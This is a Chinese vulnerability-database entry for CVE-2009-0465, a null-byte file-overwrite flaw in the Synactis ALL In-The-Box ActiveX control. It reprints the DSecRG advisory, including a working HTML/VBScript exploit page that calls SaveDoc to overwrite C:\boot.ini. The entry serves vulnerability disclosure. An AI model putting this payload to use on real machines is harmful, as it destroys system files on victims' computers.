Synactis ALL In-The-Box ActiveX 'All_In_The_Box.AllBox ActiveX'控件任意文件重写漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117321 漏洞类型 输入验证
发布时间 2009-01-30 更新时间 2009-03-06
CVE编号 CVE-2009-0465 CNNVD-ID CNNVD-200902-232
漏洞平台 Windows CVSS评分 9.3
|漏洞来源
https://www.exploit-db.com/exploits/7928
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200902-232
|漏洞详情
SynactisALLIn-The-Box是一款功能强大的开发工具。SynactisALLIn-The-BoxActiveX3版本的ALL_IN_THE_BOX.OCX里的All_In_The_Box.AllBoxActiveX控件中的SaveDoc方式允许远程攻击者借助一个以"'\0'"字符结尾的自变量,创建和重写任意文件。该自变量会绕过设置的.box文件扩展名,比如C:\boot.ini\0自变量。
|漏洞EXP
Digital Security Research Group [DSecRG] Advisory       #DSECRG-09-006

http://www.dsecrg.com/pages/vul/show.php?id=62


Application:                    Synactis All_IN_THE_BOX ActiveX
Versions Affected:              3
Vendor URL:                     http://synactis.com
Bugs:                           Null byte File overwriting
Exploits:                       YES
Reported:                       15.01.2009
Vendor response:                NONE
Second Report:                  22.01.2009
Vendor response:                NONE
Date of Public Advisory:        30.01.2009
Authors:                        Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru)


Description
***********
Synactis All_IN_THE_BOX ActiveX  Control  (ALL_IN_THE_BOX.OCX) can be used to owervrite any any file in target system.
Vulnerable method is "SaveDoc()"


Details
*******

By default when saving file All_IN_THE_BOX ActiveX control  attend extension to filename variable in "SaveDoc()" method.
For example if you enter filename "boot.ini" in "SaveDoc()" method then control will create file boot.ini.box.
But by attending a null byte to filename attacker can owervrite any file in OS (see example for owervriting boot.ini)



Class AllBox
GUID: {B5576893-F948-4E0F-9BE1-A37CB56D66FF}
Number of Interfaces: 1
Default Interface: IAllBox
RegKey Safe for Script: False
RegkeySafe for Init: False
KillBitSet: False



Example:
*******

<html>
Test Exploit page
<object classid='clsid:B5576893-F948-4E0F-9BE1-A37CB56D66FF' id='sh2kerr' ></object>
<script language='vbscript'>

targetFile = "C:\PROGRA~1\Synactis\ALLIN-~1\ALL_IN~1.OCX"
prototype  = "Sub SaveDoc ( ByVal aFileName As String )"
memberName = "SaveDoc"
progid     = "All_In_The_Box.AllBox"
argCount   = 1
arg1="C:\boot.ini"+unescape("%00")
sh2kerr.SaveDoc arg1
</script>
</html>



Fix Information
***************

No patches available.
We did not get any response from vendor for 2 weeks.




About
*****

Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website.


Contact:        research [at] dsec [dot] ru
                http://www.dsecrg.com
                http://www.dsec.ru

# milw0rm.com [2009-01-30]
|参考资料

来源:VUPEN
名称:ADV-2009-0298
链接:http://www.vupen.com/english/advisories/2009/0298
来源:BID
名称:33535
链接:http://www.securityfocus.com/bid/33535
来源:MILW0RM
名称:7928
链接:http://www.milw0rm.com/exploits/7928
来源:MISC
链接:http://www.dsecrg.com/pages/vul/show.php?id=62
来源:SECUNIA
名称:33728
链接:http://secunia.com/advisories/33728
来源:OSVDB
名称:51693
链接:http://osvdb.org/51693